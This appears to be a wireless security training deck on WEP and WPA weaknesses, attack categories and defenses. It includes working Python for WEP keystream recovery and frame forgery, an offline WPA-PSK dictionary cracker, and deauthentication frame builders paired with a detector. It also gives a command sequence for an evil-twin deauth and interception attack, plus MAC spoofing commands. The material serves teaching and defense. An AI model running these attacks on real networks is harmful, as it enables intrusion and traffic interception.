WIRELESS SECURITY
BY
CHETAN SONI, CDAC-MOHALI
CYBER SECURITY EXPERT
“WE ARE ENLIGHTENMENT TO SOME, NIGHTMARE TO OTHERS.”
Wireless Technology Statistics
Are you protected from hackers on public Wi-Fi?
o 66% of U.S. adults have used public Wi-Fi.
o 39% of U.S. public Wi-Fi users have accessed sensitive
information while using it.
What potential issues with using public Wi-Fi do people
recognize?
88% Identity Theft
76% Compromised Accounts
39% Fraudulent Tax Filing
Types of Wireless Networks
Extension to a Wired Network
Multiple Access Points
LAN to LAN Wireless Networks
3G/4G Hotspot
Wireless Networks & Security
1) What are wireless networks?
A wireless network connects a computer to a router (access point)
over radio instead of a physical cable.
2) Why do we need them?
They facilitate mobility. You could run lengthy wires instead, but someone
might trip over them.
3) Why security?
The radio medium is shared: anyone in range receives the frames.
An attacker may hack a victim's computer and steal private data,
or commit crimes from the victim's machine and identity.
Wirelessly transferred data can also be read straight off the air
with a sniffer if it is not encrypted.
Understanding Wireless Network Standards
Standard                    Frequency        Maximum rate                Modulation method
802.11                      2.4 GHz          1 or 2 Mbps                 FHSS/DSSS
802.11a                     5 GHz            54 Mbps                     OFDM
802.11b                     2.4 GHz          11 Mbps                     DSSS
802.11g                     2.4 GHz          54 Mbps                     OFDM
802.11n                     2.4 and 5 GHz    600 Mbps (4x4 MIMO)         OFDM
802.15 (WPAN)               2.4 GHz          2 Mbps                      FHSS
802.16 (WiMAX)              10-66 GHz        120 Mbps                    OFDM
802.20 (Mobile Broadband    below 3.5 GHz    1 Mbps                      OFDM
  Wireless Access WG)
Bluetooth                   2.4 GHz          1 Mbps (BR), 3 Mbps (EDR)   GFSK (BR)
HiperLAN/2                  5 GHz            54 Mbps                     OFDM
802.11 Overview
IEEE 802.11 denotes a family of WLAN standards defined by IEEE.
The most widely deployed are 802.11a/b/g/n.
802.11a (and n) use the 5 GHz band; b/g (and n) use the 2.4 GHz band.
802.11i is the security amendment (RSN: 802.1X, TKIP, CCMP); WPA2 is
the Wi-Fi Alliance certification of it.
Associating with an AP
A station authenticates first, then associates.
Two 802.11 authentication methods: Open System or Shared Key.
With Open System anyone can authenticate and associate; access is then
controlled by the WPA/WPA2 handshake (if any).
Shared Key runs a WEP challenge-response before association. It hands a
sniffer a plaintext/ciphertext pair, so it is weaker than Open System
and should not be used.
Security Approaches
Nine commonly listed approaches (not all at the same level: some are
protocols, some ciphers, some authentication back-ends):
1. WEP (Wired Equivalent Privacy)
2. WPA (Wi-Fi Protected Access)
3. WPA2 (Wi-Fi Protected Access, Version 2)
4. RADIUS (authentication server behind 802.1X/EAP)
5. CCMP (AES-based encryption and integrity, used by WPA2)
6. TKIP (RC4-based, used by WPA)
7. AES (the block cipher CCMP is built on)
8. 802.11i (the IEEE security amendment)
9. LEAP (Cisco's EAP variant, breakable by dictionary attack)
WPA and WPA2 each come in two modes: Personal (pre-shared key) and
Enterprise (802.1X with a RADIUS server).
Wired Equivalent Privacy (WEP)
WEP uses the stream cipher RC4.
RC4 generates a pseudorandom stream of bits (a "keystream") which is
combined with the plaintext using XOR.
Decryption is performed the same way (XOR with the same keystream).
• Key sizes (secret key + 24-bit IV):
– 40 / 64 bits (40 + 24 = 64)
– 104 / 128 bits (104 + 24 = 128)
– 232 / 256 bits (232 + 24 = 256, non-standard)
The per-packet RC4 key is IV || secret key; the 24-bit initialization
vector (IV) is transmitted in the clear in the frame header.
WEP
WEP has several weaknesses.
The problem is less RC4 itself than how WEP uses it: a 24-bit IV
prepended to a static key, so keystreams repeat and the first
keystream bytes are statistically biased.
This led to several attacks, e.g. the FMS/KoreK/PTW statistical key
recovery attacks and the Caffe Latte attack, which recovers the key
from a client without the real AP being present.
WEP WEAKNESS
The IV is only a 24-bit field and is sent in clear text: on a busy
network the IV space (about 16.7 million values) repeats within hours.
Association and disassociation (and deauthentication) frames are not
authenticated.
WEP keys are static shared secrets, often typed in from a passphrase,
and prone to guessing and cracking attacks.
Lack of centralized key management makes it difficult to change
the WEP keys with any regularity.
Wireless adapters from the same vendor may all generate the same
IV sequence (e.g. restarting from zero), so collisions are common.
WEP doesn't provide cryptographic integrity protection: the ICV is a
CRC-32, which is linear, so bits can be flipped and the ICV fixed up
without knowing the key.
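The two weaknesses above that matter most in practice, keystream reuse and the linear ICV, are shown by the following Python. This is an added example and not code from the slides; the WEP key, IV and packet contents are constructed for the demo, and the RC4 and CRC-32 handling follows the WEP frame format (24-bit IV prepended to the key, CRC-32 ICV appended to the plaintext before encryption).

```python
# Added illustration (not from the slides): a toy WEP implementation that
# shows keystream reuse and ICV forgery. Key, IV and packets are constructed.
import struct
import zlib


def rc4_keystream(key: bytes, n: int) -> bytes:
    """RC4 key scheduling + PRGA: return the first n keystream bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def crc32_le(data: bytes) -> bytes:
    """WEP's ICV: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (clear, 3 bytes) || RC4(IV || key) XOR (plaintext || ICV)."""
    body = plaintext + crc32_le(plaintext)
    return iv + xor(rc4_keystream(iv + key, len(body)), body)


def wep_decrypt(key: bytes, frame: bytes):
    """Return (plaintext, icv_ok). A receiver accepts the frame when icv_ok."""
    iv, ct = frame[:3], frame[3:]
    body = xor(rc4_keystream(iv + key, len(ct)), ct)
    pt, icv = body[:-4], body[-4:]
    return pt, crc32_le(pt) == icv


def keystream_from_known_plaintext(frame: bytes, known: bytes) -> bytes:
    """Weakness 1: IV reuse. C XOR P gives the keystream for this IV, which
    then decrypts every other frame sent under the same IV, key unknown."""
    return xor(frame[3:], known)


def decrypt_with_keystream(keystream: bytes, frame: bytes) -> bytes:
    return xor(keystream, frame[3:])


def forge_frame(frame: bytes, delta: bytes) -> bytes:
    """Weakness 2: CRC-32 is affine, crc(P ^ D) = crc(P) ^ crc(D) ^ crc(0...0),
    so an attacker XORs a chosen delta into the ciphertext and fixes up the
    encrypted ICV without the key. delta must be as long as the plaintext."""
    iv, ct = frame[:3], frame[3:]
    n = len(ct) - 4
    assert len(delta) == n
    icv_delta = struct.pack("<I", zlib.crc32(delta) ^ zlib.crc32(bytes(n)))
    return iv + xor(ct[:n], delta) + xor(ct[n:], icv_delta)


def demo() -> dict:
    key = bytes.fromhex("0102030405")          # constructed 40-bit WEP key
    iv = b"\x00\x00\x01"                      # an adapter that counts IVs from 0
    p1 = b"user=alice;role=user"              # constructed packet the attacker knows
    p2 = b"user=bob;role=admin!"              # constructed second packet, same IV
    f1 = wep_encrypt(key, iv, p1)
    f2 = wep_encrypt(key, iv, p2)
    ks = keystream_from_known_plaintext(f1, p1)
    recovered = decrypt_with_keystream(ks, f2)[:len(p2)]
    delta = bytes(len(p1) - 4) + xor(b"user", b"root")  # flip role=user -> role=root
    forged = forge_frame(f1, delta)
    forged_pt, forged_ok = wep_decrypt(key, forged)
    return {"recovered": recovered, "forged": forged_pt, "forged_accepted": forged_ok}
```

demo() encrypts two packets under the same IV, recovers the keystream from one known plaintext and reads the other, then flips "role=user" to "role=root" inside a ciphertext and corrects the encrypted ICV so the receiver still accepts it. Nothing in it uses the key, which is why WEP injection and bit-flipping attacks exist and why WPA added a keyed MIC (Michael) in place of the CRC.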
How to break WEP Encryption
1. Start the wireless interface in monitor mode.
2. Test the injection capability of the wireless device against the AP.
3. Use a tool such as aireplay-ng to do a fake authentication with the AP.
4. Start a Wi-Fi sniffing tool such as airodump-ng or Cain & Abel with
a BSSID filter to collect unique IVs.
5. Start a packet injection tool such as aireplay-ng in ARP
request replay mode to generate traffic (and hence fresh IVs) quickly.
6. Run a cracking tool such as Cain & Abel or aircrack-ng to extract the
encryption key from the IVs (the PTW attack needs on the order of tens
of thousands of IVs for a 104-bit key).
WPA/WPA2 Personal
WPA and WPA2 are Wi-Fi Alliance certifications for 802.11 security:
WPA was an interim fix for WEP, WPA2 implements the full 802.11i standard.
Encryption:
TKIP – Temporal Key Integrity Protocol (RC4 with per-packet keys, WPA)
AES – Advanced Encryption Standard in CCMP mode (WPA2)
Pre-Shared Key (PSK):
A passphrase of 8-63 ASCII characters (or 64 hex digits); the 256-bit
PMK is derived from it with PBKDF2-HMAC-SHA1 using the SSID as salt.
Key Renewal:
You can choose a Key Renewal period, which instructs the device how
often to re-key the group (broadcast) key. The default is 3600 seconds.
How to break WPA/WPA2 Encryption
WPA-PSK: dictionary / brute-force attack on the passphrase.
De-authentication attack to force a client to reconnect so the
4-way handshake can be captured.
Offline attack (handshake attack): guess passphrases against the
captured handshake MIC; no further contact with the network is needed.
Brute-force WPA keys (GPU cracking, e.g. hashcat).
Hole196 attack: an authorized insider holding the group key (GTK) can
spoof broadcast traffic to other clients.
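The offline handshake attack listed above works because everything the MIC depends on except the passphrase is in the air. The following Python, an added example rather than code from the slides, derives PMK, PTK and MIC the way 802.11i specifies and runs a dictionary attack against a handshake. Since no real capture is available here, the "captured" MIC is computed from a known passphrase; the MAC addresses, nonces, EAPOL stand-in and wordlist are constructed.

```python
# Added illustration (not from the slides): the offline WPA/WPA2-PSK
# handshake attack. The handshake below is constructed with a known
# passphrase; MACs, nonces and the wordlist are made up.
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, so precomputed tables only work per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    AA = AP MAC, SPA = station MAC; the first 16 bytes of the PTK are the KCK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes, ccmp: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed.
    WPA2/CCMP: HMAC-SHA1 truncated to 16 bytes; WPA/TKIP: HMAC-MD5."""
    if ccmp:
        return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]
    return hmac.new(kck, eapol_frame, hashlib.md5).digest()


def crack(ssid, aa, spa, anonce, snonce, eapol_zeroed_mic, captured_mic, wordlist):
    """Offline dictionary attack: for each candidate derive PMK -> PTK -> KCK,
    recompute the MIC of handshake message 2 and compare with the captured one.
    The 4096 PBKDF2 rounds per guess are the only thing slowing this down."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed_mic), captured_mic):
            return candidate
    return None


def demo() -> dict:
    ssid = "linksys"                                  # a default SSID
    aa = bytes.fromhex("001122334455")                # constructed AP MAC
    spa = bytes.fromhex("66778899aabb")               # constructed client MAC
    anonce = hashlib.sha256(b"anonce").digest()       # constructed 32-byte nonces
    snonce = hashlib.sha256(b"snonce").digest()
    # Constructed stand-in for EAPOL-Key message 2 with its 16-byte MIC zeroed.
    eapol = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 8 + snonce + b"\x00" * 16
    real = "linksys123"
    # What a sniffer would have captured: the MIC the real client produced.
    kck = ptk_from_pmk(pmk_from_passphrase(real, ssid), aa, spa, anonce, snonce)[:16]
    captured_mic = eapol_mic(kck, eapol)
    wordlist = ["password", "12345678", "linksys", "linksys123",
                "correcthorsebatterystaple"]
    found = crack(ssid, aa, spa, anonce, snonce, eapol, captured_mic, wordlist)
    return {"found": found, "pmk_hex": pmk_from_passphrase(real, ssid).hex()}
```

demo() recovers "linksys123" after four guesses. The same loop is what aircrack-ng and hashcat run, only faster: the attacker's cost is one PBKDF2 (4096 HMAC-SHA1 rounds) plus a PRF per guess, so a 20-character random passphrase is out of reach while a dictionary word falls in seconds. The SSID being the salt is also why a default SSID such as "linksys" is a liability: precomputed PMK tables exist for common SSIDs.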
WEP vs. WPA vs. WPA2
Encryption Attributes
        Enc. algorithm   IV size                Enc. key length   Integrity check mechanism
WEP     RC4              24-bit                 40/104-bit        CRC-32 (linear ICV)
WPA     RC4 (TKIP)       48-bit                 128-bit           Michael MIC + CRC-32
WPA2    AES-CCMP         48-bit packet number   128-bit           CBC-MAC (CCM)
What is SSID
A service set identifier (SSID) is the name used to identify a WLAN, much
the same way a workgroup name is used on a Windows network.
An SSID is configured on the AP as a 1- to 32-character, case-sensitive
name; it is a label, not a secret or an access control.
The AP usually beacons (broadcasts) the SSID several times a second so
that users with WNICs can see a display of all WLANs within range of
the AP's signal.
Many vendors ship APs with a default SSID that companies never change;
a default SSID is a strong hint that other defaults (admin password,
no encryption) are unchanged too.
For example, Cisco APs used the default SSID "tsunami." The following
table shows some default SSIDs as of this writing, but this list changes
often, sometimes daily.
Default SSIDs
Vendor          Default SSIDs
3Com            3Com, comcomcom, 101
Apple           Airport Network
Belkin (54G)    Belkin54g
Cisco           tsunami
Compaq          COMPAQ
D-Link          WLAN, default
Dell            wireless
Intel           Intel, 101, XLAN, 195, Intel Gateway
Linksys         linksys, wireless, linksys-g
Microsoft       MSHOME
Netgear         Wireless, Netgear
SMC             WLAN, BRIDGE, SMC
Symantec        101
U.S. Robotics   WLAN, USR9106, USR5450, USR8022, USR8054
Wi-Fi Terminology
WAR WALKING – Attackers walk around with Wi-Fi enabled laptops or
phones to detect open wireless networks.
WAR CHALKING – Drawing symbols in public places (walls, pavements)
to advertise open Wi-Fi networks to others.
WAR FLYING – Attackers use aircraft or drones to detect
open wireless networks.
WAR DRIVING – Attackers drive around with Wi-Fi enabled laptops and
GPS to detect and map open wireless networks.
Understanding Wardriving
Detect access points that haven't been secured.
Many APs are deployed with default or no security measures, so wardriving
can be quite rewarding for hackers.
As of this writing, wardriving itself isn't illegal; using the resources of
networks discovered with wardriving is, of course, a different story.
Wardriving has now been expanded to include warflying, which is
done by using an airplane (or drone) carrying an antenna and the same
software used in wardriving.
Understanding Wireless Hacking
Once an attacker is associated with the WLAN, hacking it isn't much
different from hacking a wired LAN.
Many of the port-scanning and enumeration tools you've
learned about can be applied to wireless networks.
The wireless-specific work is getting on: discovery, breaking the
encryption, or bypassing access control.
Wireless Threats: Access Control Attacks
Wireless access control attacks aim to penetrate a
network by evading WLAN access control measures (SSID hiding,
MAC filtering, 802.1X).
1. War Driving
2. Rogue Access Points
3. AP Misconfiguration
4. MAC Spoofing
5. Ad-Hoc Associations
6. Unauthorized Associations
7. Client Mis-association
Wireless Threats: Integrity Attacks
In integrity attacks, attackers send forged control, management or
data frames over a wireless network to misdirect the wireless
devices, usually as a step toward another attack.
1. Data Frame Injection
2. WEP Injection
3. Data Replay
4. Initialization Vector Replay Attacks
5. Bit-Flipping Attacks
6. RADIUS Replay
7. EAP Replay
8. Wireless Network Viruses
Wireless Threats: Confidentiality Attacks
These attacks attempt to intercept confidential information
sent over wireless associations, whether sent in clear text or
encrypted by Wi-Fi protocols.
1. Eavesdropping
2. Honeypot Access Point
3. Traffic Analysis
4. Cracking WEP Key
5. Evil Twin AP
6. Session Hijacking
7. MITM (Man-in-the-Middle Attack)
Wireless Threats: Availability Attacks
Denial-of-service attacks aim to prevent legitimate users from accessing
resources in a wireless network. Because 802.11 management frames are
unauthenticated (unless 802.11w Protected Management Frames is in use),
many of these need no key at all.
1. Access Point Theft
2. Disassociation Attacks
3. EAP-Failure
4. Beacon Flood
5. Denial-of-Service
6. De-authenticate Flood
7. Routing Attacks
8. Authenticate Flood
9. ARP Cache Poisoning Attack
10. Power Saving Attacks
11. TKIP MIC Exploit
Wireless Threats: Authentication Attacks
The objective of authentication attacks is to steal the identity
of Wi-Fi clients, their personal information, login credentials,
etc., to gain unauthorized access to network resources.
1. PSK Cracking
2. LEAP Cracking
3. VPN Login Cracking
4. Domain Login Cracking
5. Identity Theft
6. Shared Key Guessing
7. Password Speculation
8. Application Login Theft
Wireless Hacking Methodology
The objective of the wireless hacking methodology is to
compromise a Wi-Fi network in order to gain
unauthorized access to network resources.
Wi-Fi Discovery
GPS Mapping
Wireless Traffic Analysis
Launch Wireless Attacks
Crack Wi-Fi Encryption
Compromise the Wi-Fi
Wireless Discovery Tools
InSSIDer
NetSurveyor
Vistumbler
NetStumbler
WirelessMon
Kismet
Wi-Fi Hopper
Wavestumbler
iStumbler
Wi-Finder
AirRadar
Attacking Tools/Packages
• iwconfig – a tool for configuring wireless adapters.
You can use it to check that your wireless adapter is in "monitor" mode
(needed to capture raw 802.11 frames; frame injection additionally needs
a driver that supports it).
• macchanger – a tool that allows you to view and/or spoof (fake) your MAC
address.
• airmon-ng – puts your wireless adapter into monitor mode (creates mon0).
• airodump-ng – captures frames from a wireless router (otherwise
known as an AP) and lists nearby APs and their clients.
• aireplay-ng – frame injection: fake authentication, ARP request replay,
deauthentication.
• airbase-ng – creates a fake AP.
• aircrack-ng – recovers WEP keys from captured IVs and WPA-PSK
passphrases from captured handshakes.
and many more....
Aircrack-ng
As a security professional, your job is to protect a network and make it difficult for
attackers to break in. You might like to believe you can completely prevent
attackers from breaking in, but unfortunately, this goal is impossible.
Aircrack-ng (included in BackTrack or available free at www.aircrack-ng.org)
is the tool most attackers use to break into WEP-enabled WLANs.
Aircrack-ng replaced AirSnort, a product created by wireless security researchers
Jeremy Bruestle and Blake Hegerle, who set out to prove that WEP encryption
was faulty and easy to crack.
AirSnort was the first widely used WEP-cracking program and woke up
nonbelievers who thought WEP was enough protection for a WLAN.
Aircrack-ng took up where AirSnort (and the slightly older WEPCrack) left off.
Defend – when you are using WEP
None of the following makes WEP safe; they only slow an attacker down.
The real fix is to move to WPA2 (AES-CCMP).
Use longer WEP encryption keys (128-bit if your WLAN equipment supports
them); this makes the statistical analysis harder, though the PTW attack
still recovers a 104-bit key from a few tens of thousands of packets.
Change your WEP keys frequently. Some devices support
"dynamic WEP" (per-user keys delivered via 802.1X), which is off the
standard but allows different WEP keys to be assigned to each user.
Run a VPN over the WLAN for any protocol that may carry sensitive
information, so confidentiality does not rest on WEP.
Implement a different technique for encrypting traffic, such as IPsec
over wireless.
To do this, you will probably need to install IPsec software on each wireless client
and put the access points on an isolated VLAN that reaches only the IPsec gateway.
Defend – when you are using WPA
Passphrases – the practical way to crack WPA-PSK is to capture the
4-way handshake and guess the passphrase offline (the PMK is derived
from the passphrase and the SSID). If the passphrase is long and random,
this is infeasible.
Passphrase Complexity – select a random passphrase that is not
made up of dictionary words or a predictable pattern.
Select a complex passphrase of a minimum of 20 characters in length and
change it at regular intervals; avoid a default or common SSID, since
precomputed PMK tables exist for those.
Where possible use WPA/WPA2 Enterprise (802.1X with RADIUS) so there
is no shared passphrase to capture.
Common Defense Techniques
Change the router's default user name and password.
Change the internal IP subnet if possible.
Change the default SSID (Service Set Identifier) and disable SSID
broadcasting.
None of the attack methods above get faster or more effective when a
longer passphrase is used.
Restrict access to your wireless network by filtering access based
on MAC (Media Access Control) addresses.
Use encryption (WPA2 with AES).
Protecting your network
There are several methods to increase the security of a
wireless network.
Turning off SSID broadcasting.
SSID broadcasting helps attackers find your WLAN.
While not broadcasting will not stop anyone (the SSID still appears in
probe and association frames), it will make
your network less interesting.
MAC Address Filtering
MAC address filtering allows only a set list of hardware
devices to connect.
In theory every device has a unique MAC address.
However, using a sniffer the MAC address of a valid client
is easily found.
Most wireless cards allow their MAC addresses to be
changed.
Top Wi-Fi Hacking Tools
Aircrack-ng
Reaver
Pixiewps
Wifite
Wireshark
oclHashcat (now hashcat)
Fern Wifi Cracker
Wash
Crunch
MAC Spoofing Attack
MAC spoofing attackers change their MAC address to that
of an authenticated user to bypass the MAC filtering
configured on an access point.
Commands (Linux; the interface must be down to change the address) -
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55
ifconfig wlan0 up
Tools – macchanger (Linux), SMAC (for Windows)
HTTP/HTTPS - PACKET CAPTURING
The objective is to capture a victim's network- and application-layer
traffic over a wireless network by placing the attacker between the
victim and the real network.
This is achieved by creating a fake access point (an evil twin) and
forcing clients onto it with deauthentication frames, or, when already on
the same Wi-Fi network as the victim, by sending forged ARP (Address
Resolution Protocol) packets that poison the victim's ARP cache so its
traffic goes via the attacker. The name of the access point is the ESSID
(Extended Service Set Identification).
The name of the fake access point must be the same as the
name of the network the victim is connected to for the evil twin to
work effectively.
Flow Process (diagram not reproduced)
Important Terms
BSSID = Basic Service Set Identifier (the AP's MAC address)
ESSID = Extended Service Set Identifier (the Wi-Fi name / SSID)
WEP = Wired Equivalent Privacy
WPA = Wi-Fi Protected Access
WAP = Wireless Application Protocol (not to be confused with a wireless
access point)
PSK = Pre-Shared Key
AES = Advanced Encryption Standard, used by CCMP (802.11i)
TKIP = Temporal Key Integrity Protocol (802.11i)
CHANNEL = 2.4 GHz band: channels 1-13 centred at 2412-2472 MHz,
5 MHz apart (channel 14 at 2484 MHz is Japan only)
Implementation
REQUIREMENTS –
Linux-based operating system (BackTrack 5 R3)
TP-Link USB adapter (chipset must support monitor mode and injection)
Aircrack-ng suite
DHCP client package
Wireshark packet analyzer (for HTTP)
Ettercap sniffer (only for HTTPS)
sslstrip (only for HTTPS: downgrades HTTPS links to HTTP; defeated by
HSTS and certificate pinning)
COMMANDS
airmon-ng start wlan0                    # monitor-mode interface mon0
airodump-ng mon0                         # find the target ESSID/BSSID/channel
airbase-ng -e "FAKE-AP" mon0             # fake AP (use the target's ESSID); creates at0
brctl addbr mitm                         # bridge at0 to the wired uplink
brctl addif mitm eth0
brctl addif mitm at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig mitm up
aireplay-ng --deauth 0 -a <BSSID> mon0   # 0 = keep kicking clients off the real AP
dhclient3 mitm &                         # get an address on the bridge
wireshark &                              # capture on mitm
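The deauthentication step above, and the deauth/disassociation floods in the availability attacks listed earlier, rely on management frames that carry no MIC. The following Python, an added example and not code from the slides, builds beacon and deauthentication frames the way airbase-ng and aireplay-ng emit them, parses them (including the zero-length SSID element of a "hidden" network), and runs a simple deauth-flood detector over a constructed capture. The BSSID, client address, timings and SSID are made up; no real interface is touched.

```python
# Added illustration (not from the slides): 802.11 management frames used in
# the evil-twin flow, and a detector for the deauth flood. Addresses, SSID
# and timestamps are constructed.
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
SUBTYPE_BEACON, SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 8, 10, 12


def mac_bytes(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mgmt_header(subtype: int, dst: str, src: str, bssid: str, seq: int) -> bytes:
    """24-byte management header: frame control (version 0, type 0, subtype),
    duration, addr1=dst, addr2=src, addr3=bssid, sequence control."""
    fc = subtype << 4
    return struct.pack("<HH6s6s6sH", fc, 0, mac_bytes(dst), mac_bytes(src),
                       mac_bytes(bssid), (seq & 0xFFF) << 4)


def build_deauth(dst: str, bssid: str, reason: int = 7, seq: int = 0) -> bytes:
    """Deauthentication frame as 'aireplay-ng --deauth' sends it: header plus a
    2-byte reason code. No MIC, so without 802.11w anyone in range can forge
    it in the AP's name (source and BSSID both set to the AP)."""
    return mgmt_header(SUBTYPE_DEAUTH, dst, bssid, bssid, seq) + struct.pack("<H", reason)


def build_beacon(bssid: str, ssid: str, seq: int = 0) -> bytes:
    """Beacon: header, 8-byte timestamp, 2-byte interval, 2-byte capabilities,
    then information elements; IE 0 is the SSID (length 0 when 'hidden')."""
    fixed = struct.pack("<QHH", 0, 100, 0x0411)
    ssid_ie = bytes([0, len(ssid)]) + ssid.encode()
    return mgmt_header(SUBTYPE_BEACON, BROADCAST, bssid, bssid, seq) + fixed + ssid_ie


def parse_frame(frame: bytes) -> dict:
    """Decode the header and, for deauth/disassoc and beacon, the body."""
    fc, _dur, a1, a2, a3, seqctl = struct.unpack("<HH6s6s6sH", frame[:24])
    info = {"type": (fc >> 2) & 3, "subtype": (fc >> 4) & 0xF, "dst": mac_str(a1),
            "src": mac_str(a2), "bssid": mac_str(a3), "seq": seqctl >> 4}
    body = frame[24:]
    if info["type"] == 0 and info["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        info["reason"] = struct.unpack("<H", body[:2])[0]
    elif info["type"] == 0 and info["subtype"] == SUBTYPE_BEACON:
        ies, pos = body[12:], 0
        info["ssid"] = None
        while pos + 2 <= len(ies):
            eid, ln = ies[pos], ies[pos + 1]
            if eid == 0:
                info["ssid"] = ies[pos + 2:pos + 2 + ln].decode(errors="replace")
                info["hidden"] = ln == 0
            pos += 2 + ln
    return info


class DeauthFloodDetector:
    """Alert when a BSSID sources `threshold` or more deauth/disassoc frames
    within `window` seconds: a real AP rarely kicks clients in bursts."""

    def __init__(self, threshold: int = 10, window: float = 1.0):
        self.threshold, self.window = threshold, window
        self.seen = defaultdict(deque)

    def observe(self, ts: float, frame: bytes):
        info = parse_frame(frame)
        if info["type"] != 0 or info["subtype"] not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            return None
        q = self.seen[info["bssid"]]
        q.append(ts)
        while q and ts - q[0] > self.window:
            q.popleft()
        if len(q) >= self.threshold:
            return {"bssid": info["bssid"], "count": len(q), "reason": info["reason"]}
        return None


def demo() -> list:
    ap = "00:11:22:33:44:55"                      # constructed target BSSID
    capture = [(i * 0.1, build_beacon(ap, "linksys", i)) for i in range(5)]
    capture.append((0.6, build_deauth("66:77:88:99:aa:bb", ap, reason=3)))  # one legit deauth
    # aireplay-ng --deauth 0 -a <BSSID>: an unending burst of broadcast deauths
    capture += [(1.0 + i * 0.01, build_deauth(BROADCAST, ap, seq=i)) for i in range(20)]
    det = DeauthFloodDetector(threshold=10, window=1.0)
    alerts = []
    for ts, frame in capture:
        alert = det.observe(ts, frame)
        if alert:
            alerts.append(alert)
    return alerts
```

demo() raises nothing for the single legitimate deauthentication but alerts from the tenth frame of the burst onward. A wireless IDS does essentially this per BSSID; the structural fix is 802.11w (Protected Management Frames), which adds a MIC to deauth and disassociation frames so a forged one is dropped.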
Data Sniffing
Defenses
Public key infrastructure – certificate validation (never click through
certificate warnings; HSTS stops sslstrip downgrades)
Stronger mutual authentication with secret keys and passwords
Second (secure) channel verification
Carry-forward verification
Secure VPN with mutual authentication
ANY QUERY
Mail at chetansoni@cdac.in